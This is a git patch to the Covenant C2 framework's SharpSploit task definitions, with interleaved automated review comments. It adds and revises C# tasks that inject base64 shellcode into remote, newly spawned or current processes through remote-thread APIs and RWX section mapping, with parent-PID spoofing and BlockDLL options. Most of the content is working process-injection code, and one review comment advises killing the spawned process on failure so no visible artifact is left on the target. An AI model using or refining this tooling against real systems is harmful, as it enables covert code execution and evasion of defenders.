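Review bot: In ProcessInjectionSpawn's `Code:` string, the process created by `Shell.CreateProcessPInvoke` / `Shell.CreateProcessPInvokePPID` is never cleaned up when the following `Allocate` or `Inject` call throws — the `catch` returns the exception text and the freshly spawned process (e.g. notepad.exe) is left running on the target as a visible artifact. Hoist the variable with `Process proc = null;` before the `try`, assign it with `proc = Process.GetProcessById(ProcID);`, and in the catch add `if (proc != null) { try { proc.Kill(); } catch { } }` before returning so a failed injection does not leave a stray process behind. As in the other tasks, `payloadLocation` from the explicit `Allocate` call is unused and likely duplicates the mapping that `Injector.Inject` performs with the same `allocationTechnique`.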
@@ -1206,7 +1206,7 @@ - Name: ProcessName Value: '' DefaultValue: '' - Description: Process ID of the process to impersonate + Description: Full path of the new process to spawn (e.g. C:\windows\system32\notepad.exe). SuggestedValues: [] Optional: false DisplayInCommand: true @@ -1222,7 +1222,7 @@ - Name: ParentPID Value: '' DefaultValue: '' - Description: ppid + Description: PID of the parent process to spoof. SuggestedValues: [] Optional: true DisplayInCommand: true 
@@ -1305,157 +1305,3 @@ EmbeddedResources: [] ReferenceAssemblies: [] EmbeddedResources: [] -- Name: ProcessInjectionSpawnAs - Aliases: [] - Author: - Name: '' - Handle: '' - Link: '' - Description: aaa - Help: - Language: CSharp - CompatibleDotNetVersions: - - Net35 - - Net40 - Code: "using System;\nusing System.Diagnostics;\n\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string Technique, string ProcessName, string ShellCode,string Username, string Password, string Domain, string ParentPID)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n\n if (Technique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (Technique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (Technique == \"RtlCreateUserThread\") {apiTechnique = RemoteThreadCreate.APIS.RtlCreateUserThread;}\n //TODO review how to detect empty string \n else if (Technique == \"\" || Technique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + Technique + \" is not implemented. 
Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n { \n int ProcID;\n if (ParentPID == \"\" || ParentPID == \"\\\"\")\n {\n ProcID = (int)Shell.createProcessAsPInvoke(ProcessName, Domain, Username, Password).dwProcessId;\n }\n else\n {\n output += \"not implmented\";\n return output;\n //TODO\n // ADD FUNCTION IN SHARPSPLOIT\n //int PPID = Int32.Parse(ParentPID);\n //ProcID = (int)Shell.CreateProcessPInvokePPID(ProcessName,PPID).dwProcessId;\n }\n Process proc = Process.GetProcessById(ProcID);\n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(ShellCode));\n IntPtr payloadLocation = allocationTechnique.Allocate(payload, proc);\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"attempting to inject the provided shellcode into process \" + proc.ProcessName;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}\n\n" - TaskingType: Assembly - UnsafeCompile: false - TokenTask: false - Options: - - Name: Technique - Value: '' - DefaultValue: CreateRemoteThread - Description: Injection technique - SuggestedValues: - - CreateRemoteThread - - NtCreateThreadEx - - RtlCreateUserThread - Optional: true - DisplayInCommand: true - FileOption: false - - Name: ProcessName - Value: '' - DefaultValue: '' - Description: Process ID of the process to impersonate - SuggestedValues: [] - Optional: false - DisplayInCommand: true - FileOption: false - - Name: ShellCode - Value: 
'' - DefaultValue: '' - Description: ShellCode to Inject. - SuggestedValues: [] - Optional: false - DisplayInCommand: false - FileOption: true - - Name: Username - Value: '' - DefaultValue: '' - Description: '' - SuggestedValues: [] - Optional: false - DisplayInCommand: true - FileOption: false - - Name: Password - Value: '' - DefaultValue: '' - Description: '' - SuggestedValues: [] - Optional: false - DisplayInCommand: true - FileOption: false - - Name: Domain - Value: '' - DefaultValue: '' - Description: '' - SuggestedValues: [] - Optional: false - DisplayInCommand: true - FileOption: false - - Name: ParentPID - Value: '' - DefaultValue: '' - Description: '' - SuggestedValues: [] - Optional: true - DisplayInCommand: true - FileOption: false - ReferenceSourceLibraries: - - Name: SharpSploit - Description: SharpSploit is a library for C# post-exploitation modules. - Location: SharpSploit\SharpSploit\ - Language: CSharp - CompatibleDotNetVersions: - - Net35 - - Net40 - ReferenceAssemblies: - - Name: System.Core.dll - Location: net40\System.Core.dll - DotNetVersion: Net40 - - Name: System.DirectoryServices.dll - Location: net40\System.DirectoryServices.dll - DotNetVersion: Net40 - - Name: System.DirectoryServices.Protocols.dll - Location: net40\System.DirectoryServices.Protocols.dll - DotNetVersion: Net40 - - Name: System.dll - Location: net40\System.dll - DotNetVersion: Net40 - - Name: System.IdentityModel.dll - Location: net40\System.IdentityModel.dll - DotNetVersion: Net40 - - Name: System.Management.Automation.dll - Location: net40\System.Management.Automation.dll - DotNetVersion: Net40 - - Name: System.Management.dll - Location: net40\System.Management.dll - DotNetVersion: Net40 - - Name: System.ServiceProcess.dll - Location: net40\System.ServiceProcess.dll - DotNetVersion: Net40 - - Name: mscorlib.dll - Location: net40\mscorlib.dll - DotNetVersion: Net40 - - Name: System.XML.dll - Location: net35\System.XML.dll - DotNetVersion: Net35 - - Name: 
System.Windows.Forms.dll - Location: net35\System.Windows.Forms.dll - DotNetVersion: Net35 - - Name: System.dll - Location: net35\System.dll - DotNetVersion: Net35 - - Name: System.DirectoryServices.Protocols.dll - Location: net35\System.DirectoryServices.Protocols.dll - DotNetVersion: Net35 - - Name: System.DirectoryServices.dll - Location: net35\System.DirectoryServices.dll - DotNetVersion: Net35 - - Name: System.Core.dll - Location: net35\System.Core.dll - DotNetVersion: Net35 - - Name: mscorlib.dll - Location: net35\mscorlib.dll - DotNetVersion: Net35 - - Name: System.IdentityModel.dll - Location: net35\System.IdentityModel.dll - DotNetVersion: Net35 - - Name: System.Management.Automation.dll - Location: net35\System.Management.Automation.dll - DotNetVersion: Net35 - - Name: System.Management.dll - Location: net35\System.Management.dll - DotNetVersion: Net35 - - Name: System.ServiceProcess.dll - Location: net35\System.ServiceProcess.dll - DotNetVersion: Net35 - - Name: System.Windows.Forms.dll - Location: net40\System.Windows.Forms.dll - DotNetVersion: Net40 - - Name: System.XML.dll - Location: net40\System.XML.dll - DotNetVersion: Net40 - EmbeddedResources: [] - ReferenceAssemblies: [] - EmbeddedResources: [] \ No newline at end of file From 918df28c6ccfde7ed9a0698b09ee9bd31c012cb4 Mon Sep 17 00:00:00 2001 From: salu90 Date: Wed, 30 Sep 2020 16:26:21 +0200 Subject: [PATCH 3/3] Update ProcessInjectionRemote, ProcessInjectionSpawn and add ProcessInjectionLocal --- .../Data/Tasks/SharpSploit.Execution.yaml | 180 ++++++++++++++++-- 1 file changed, 165 insertions(+), 15 deletions(-) diff --git a/Covenant/Data/Tasks/SharpSploit.Execution.yaml b/Covenant/Data/Tasks/SharpSploit.Execution.yaml index 2c5beaca..ff0083ad 100644 --- a/Covenant/Data/Tasks/SharpSploit.Execution.yaml +++ b/Covenant/Data/Tasks/SharpSploit.Execution.yaml 
@@ -1053,19 +1053,19 @@ EmbeddedResources: [] ReferenceAssemblies: [] EmbeddedResources: [] -- Name: ProcessInjection +- Name: ProcessInjectionRemote Aliases: [] Author: - Name: 'Simone Salucci & Daniel López' + Name: Simone Salucci & Daniel López Handle: '@saim1z @attl4s' Link: '' - Description: Injects and executes the specified shellcode into the process specified by the ProcessID parameter using one of the available techniques + Description: Injects and executes the specified Positional Independent Code into the process specified by the ProcessID parameter using one of the available techniques. Help: Language: CSharp CompatibleDotNetVersions: - Net35 - Net40 - Code: "using System;\nusing System.Diagnostics;\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string ExecutionTechnique, string ProcessID, string ShellCode)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n\n if (ExecutionTechnique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (ExecutionTechnique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (ExecutionTechnique == \"RtlCreateUserThread\") {apiTechnique = RemoteThreadCreate.APIS.RtlCreateUserThread;}\n else if (ExecutionTechnique == \"\" || ExecutionTechnique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + ExecutionTechnique + \" is not implemented. 
Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n { \n int ProcID;\n int currentProcessID = Process.GetCurrentProcess().Id;\n if (ProcessID == \"\" || ProcessID == \"\\\"\")\n {\n ProcID = currentProcessID;\n output += \"PID not specified, shellcode will be injected into the current process\\n\";\n }\n else\n {\n ProcID = Int32.Parse(ProcessID);\n }\n \n Process proc = Process.GetProcessById(ProcID);\n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(ShellCode));\n IntPtr payloadLocation = allocationTechnique.Allocate(payload, proc);\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"Attempting to inject the provided shellcode into process \" + proc.ProcessName + \" with PID \" + ProcID;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}" + Code: "using System;\nusing System.Diagnostics;\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string ExecutionTechnique, string ProcessID, string PICpayload)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n\n if (ExecutionTechnique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (ExecutionTechnique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (ExecutionTechnique == \"RtlCreateUserThread\") {apiTechnique = 
RemoteThreadCreate.APIS.RtlCreateUserThread;}\n else if (ExecutionTechnique == \"\" || ExecutionTechnique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + ExecutionTechnique + \" is not implemented. Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n { \n if (ProcessID == \"\" || ProcessID == \"\\\"\")\n {\n output += \"No ProcessID passed as argument. Please specify a valid ProcessID\";\n }\n \n int ProcID = Int32.Parse(ProcessID); \n Process proc = Process.GetProcessById(ProcID);\n \n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n \n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(PICpayload));\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"Attempting to inject the provided shellcode into process \" + proc.ProcessName + \" with PID \" + ProcID;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}" TaskingType: Assembly UnsafeCompile: false TokenTask: false @@ -1073,7 +1073,7 @@ - Name: ExecutionTechnique Value: '' DefaultValue: CreateRemoteThread - Description: The technique used to execute the specified shellcode. + Description: The technique used to execute the specified Positional Independent Code. SuggestedValues: - CreateRemoteThread - NtCreateThreadEx 
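Review bot: The empty-ProcessID branch in the new ProcessInjectionRemote `Execute` appends "No ProcessID passed as argument. Please specify a valid ProcessID" but does not return, so control falls straight into `Int32.Parse(ProcessID)`, which throws FormatException on an empty string and the catch replaces the intended message with a stack trace; add `return output;` inside that `if`. A non-numeric PID takes the same path, so `int ProcID; if (!int.TryParse(ProcessID, out ProcID)) { return output + "ProcessID is not a valid integer"; }` would give callers a clear message instead of an exception dump. The `return output;` after the catch block is unreachable, since every path inside the try already returns (CS0162); the same dead trailing return appears in the ProcessInjectionSpawn hunk and in the ProcessInjectionLocal hunk, where it means the "ShellCode execution failed." message can never actually be emitted.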
@@ -1084,15 +1084,15 @@ - Name: ProcessID Value: '' DefaultValue: '' - Description: Process ID of the process to impersonate. If empty, the shellcode will be injected into the current process. + Description: Process ID of the process to impersonate. SuggestedValues: [] - Optional: true + Optional: false DisplayInCommand: true FileOption: false - - Name: ShellCode + - Name: PICpayload Value: '' DefaultValue: '' - Description: ShellCode to Inject. + Description: Positional Independent Code to inject into the target process. SuggestedValues: [] Optional: false DisplayInCommand: false 
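Review bot: The new description of the `ProcessID` option, "Process ID of the process to impersonate.", mislabels it: the task passes this value to `Process.GetProcessById` as the injection target and nothing in the task impersonates anything. Since this hunk also makes the option mandatory by dropping the current-process fallback, the text should say both, e.g. `Description: Process ID of the target process the payload is injected into (required).`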
@@ -1178,16 +1178,16 @@ - Name: ProcessInjectionSpawn Aliases: [] Author: - Name: 'Simone Salucci & Daniel López' + Name: Simone Salucci & Daniel López Handle: '@saim1z @attl4s' Link: '' - Description: Creates a new process using the createProcess Win32 API call through PInvoke and injects and executes the specified shellcode using one of the available techniques + Description: Creates a new process using the createProcess Win32 API call through PInvoke and injects and executes the specified Positional Independent Code using one of the available techniques. Supports Parent Process Spoofing (PPID) and the BlockDLL attribute. Help: Language: CSharp CompatibleDotNetVersions: - Net35 - Net40 - Code: "using System;\nusing System.Diagnostics;\n\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string ExecutionTechnique, string ProcessName, string ShellCode,string ParentPID)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n\n if (ExecutionTechnique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (ExecutionTechnique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (ExecutionTechnique == \"RtlCreateUserThread\") {apiTechnique = RemoteThreadCreate.APIS.RtlCreateUserThread;} \n else if (ExecutionTechnique == \"\" || ExecutionTechnique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + ExecutionTechnique + \" is not implemented. 
Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n { \n int ProcID;\n if (ParentPID == \"\" || ParentPID == \"\\\"\")\n {\n ProcID = (int)Shell.CreateProcessPInvoke(ProcessName).dwProcessId;\n }\n else\n {\n int PPID = Int32.Parse(ParentPID);\n ProcID = (int)Shell.CreateProcessPInvokePPID(ProcessName,PPID).dwProcessId;\n }\n \n Process proc = Process.GetProcessById(ProcID);\n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(ShellCode));\n IntPtr payloadLocation = allocationTechnique.Allocate(payload, proc);\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"Attempting to inject the provided shellcode into process \" + proc.ProcessName;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}\n\n" + Code: "using System;\nusing System.Diagnostics;\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string ExecutionTechnique, string Binary, string PICpayload, string ParentPID, string BlockDLL)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n \n if (ExecutionTechnique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (ExecutionTechnique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (ExecutionTechnique == \"RtlCreateUserThread\") {apiTechnique = 
RemoteThreadCreate.APIS.RtlCreateUserThread;} \n else if (ExecutionTechnique == \"\" || ExecutionTechnique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + ExecutionTechnique + \" is not implemented. Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n { \n bool BlockDLLb = (BlockDLL.ToLower() == \"true\" ? true : false);\n \n int ProcID;\n if (ParentPID == \"\" || ParentPID == \"\\\"\")\n {\n ProcID = (int)Shell.CreateProcessPInvoke(Binary,BlockDLLb).dwProcessId;\n }\n else\n {\n int PPID = Int32.Parse(ParentPID);\n ProcID = (int)Shell.CreateProcessPInvokePPID(Binary,PPID,BlockDLLb).dwProcessId;\n }\n \n Process proc = Process.GetProcessById(ProcID);\n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(PICpayload));\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"Attempting to inject the provided shellcode into process \" + proc.ProcessName;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}\n\n" TaskingType: Assembly UnsafeCompile: false TokenTask: false 
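Review bot: `bool BlockDLLb = (BlockDLL.ToLower() == "true" ? true : false);` in the new ProcessInjectionSpawn body uses a culture-sensitive `ToLower()` and a redundant conditional, and throws NullReferenceException if `BlockDLL` arrives null rather than empty; `bool BlockDLLb; bool.TryParse(BlockDLL, out BlockDLLb);` handles null, empty, "true"/"True" and the YAML default alike, while `string.Equals(BlockDLL, "true", StringComparison.OrdinalIgnoreCase)` is the minimal culture-safe form if only the literal "true" should count. `int PPID = Int32.Parse(ParentPID);` likewise turns a non-numeric ParentPID into a generic exception dump rather than a message naming the bad option; `int.TryParse` with an explicit error return would match how the ExecutionTechnique branch reports invalid input.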
@@ -1203,7 +1203,7 @@ Optional: true DisplayInCommand: true FileOption: false - - Name: ProcessName + - Name: Binary Value: '' DefaultValue: '' Description: Full path of the new process to spawn (e.g. C:\windows\system32\notepad.exe). @@ -1211,10 +1211,10 @@ Optional: false DisplayInCommand: true FileOption: false - - Name: ShellCode + - Name: PICpayload Value: '' DefaultValue: '' - Description: ShellCode to Inject. + Description: Positional Independent Code to inject in the target process. SuggestedValues: [] Optional: false DisplayInCommand: false 
@@ -1227,6 +1227,156 @@ Optional: true DisplayInCommand: true FileOption: false + - Name: BlockDLL + Value: '' + DefaultValue: False + Description: Boolean, whether to use BlockDDL. + SuggestedValues: [] + Optional: true + DisplayInCommand: true + FileOption: false + ReferenceSourceLibraries: + - Name: SharpSploit + Description: SharpSploit is a library for C# post-exploitation modules. + Location: SharpSploit\SharpSploit\ + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + ReferenceAssemblies: + - Name: System.Core.dll + Location: net40\System.Core.dll + DotNetVersion: Net40 + - Name: System.DirectoryServices.dll + Location: net40\System.DirectoryServices.dll + DotNetVersion: Net40 + - Name: System.DirectoryServices.Protocols.dll + Location: net40\System.DirectoryServices.Protocols.dll + DotNetVersion: Net40 + - Name: System.dll + Location: net40\System.dll + DotNetVersion: Net40 + - Name: System.IdentityModel.dll + Location: net40\System.IdentityModel.dll + DotNetVersion: Net40 + - Name: System.Management.Automation.dll + Location: net40\System.Management.Automation.dll + DotNetVersion: Net40 + - Name: System.Management.dll + Location: net40\System.Management.dll + DotNetVersion: Net40 + - Name: System.ServiceProcess.dll + Location: net40\System.ServiceProcess.dll + DotNetVersion: Net40 + - Name: mscorlib.dll + Location: net40\mscorlib.dll + DotNetVersion: Net40 + - Name: System.XML.dll + Location: net35\System.XML.dll + DotNetVersion: Net35 + - Name: System.Windows.Forms.dll + Location: net35\System.Windows.Forms.dll + DotNetVersion: Net35 + - Name: System.dll + Location: net35\System.dll + DotNetVersion: Net35 + - Name: System.DirectoryServices.Protocols.dll + Location: net35\System.DirectoryServices.Protocols.dll + DotNetVersion: Net35 + - Name: System.DirectoryServices.dll + Location: net35\System.DirectoryServices.dll + DotNetVersion: Net35 + - Name: System.Core.dll + Location: net35\System.Core.dll + DotNetVersion: Net35 + - Name: 
mscorlib.dll + Location: net35\mscorlib.dll + DotNetVersion: Net35 + - Name: System.IdentityModel.dll + Location: net35\System.IdentityModel.dll + DotNetVersion: Net35 + - Name: System.Management.Automation.dll + Location: net35\System.Management.Automation.dll + DotNetVersion: Net35 + - Name: System.Management.dll + Location: net35\System.Management.dll + DotNetVersion: Net35 + - Name: System.ServiceProcess.dll + Location: net35\System.ServiceProcess.dll + DotNetVersion: Net35 + - Name: System.Windows.Forms.dll + Location: net40\System.Windows.Forms.dll + DotNetVersion: Net40 + - Name: System.XML.dll + Location: net40\System.XML.dll + DotNetVersion: Net40 + EmbeddedResources: [] + ReferenceAssemblies: [] + EmbeddedResources: [] +- Name: ProcessInjectionLocal + Aliases: [] + Author: + Name: Simone Salucci & Daniel López + Handle: '@saim1z @attl4s' + Link: '' + Description: Injects and executes the specified Positional Independent Code into the current process. + Help: + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + Code: >- + using System; + + using System.Diagnostics; + + using System.Runtime.InteropServices; + + using SharpSploit.Execution; + + using SharpSploit.Execution.Injection; + + + public static class Task + + { + [UnmanagedFunctionPointerAttribute(CallingConvention.Cdecl)] + private delegate Int32 Run(); + + public static string Execute(string PICpayload) + { + try + { + Process proc = Process.GetCurrentProcess(); + SectionMapAlloc allocationTechnique = new SectionMapAlloc + { + localSectionPermissions = Win32.WinNT.PAGE_READWRITE, + remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE, + sectionAttributes = Win32.WinNT.SEC_COMMIT + }; + + PICPayload payload = new PICPayload(Convert.FromBase64String(PICpayload)); + IntPtr baseAddr = allocationTechnique.Allocate(payload, proc); + Run del = (Run)Marshal.GetDelegateForFunctionPointer(baseAddr, typeof(Run)); + del(); + return "ShellCode execution succeeded."; + } + catch 
(Exception e) { return e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace; } + return "ShellCode execution failed."; + } + } + TaskingType: Assembly + UnsafeCompile: false + TokenTask: false + Options: + - Name: PICpayload + Value: '' + DefaultValue: '' + Description: Positional Independent Code to inject into the current process. + SuggestedValues: [] + Optional: false + DisplayInCommand: false + FileOption: true ReferenceSourceLibraries: - Name: SharpSploit Description: SharpSploit is a library for C# post-exploitation modules.
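Review bot: The new `BlockDLL` option description, "Boolean, whether to use BlockDDL.", misspells the option's own name and should read `Description: Boolean, whether to spawn the process with the BlockDLL mitigation policy.`; "Positional Independent Code" in the new task and option descriptions should be "Position Independent Code". `DefaultValue: False` is an unquoted YAML boolean scalar while every sibling option quotes its default (`''`), so depending on the loader the value handed to ProcessInjectionSpawn's string comparison may be "False", "false" or a boolean — quoting it (`DefaultValue: 'False'`) keeps the option consistent with its neighbours. In ProcessInjectionLocal, the `Run` delegate is declared as a private nested member of `Task` but has no comment stating why a Cdecl unmanaged function pointer is assumed; a one-line comment above `private delegate Int32 Run();` noting that the PIC is expected to follow the cdecl convention and return an Int32 would document that contract for the next maintainer.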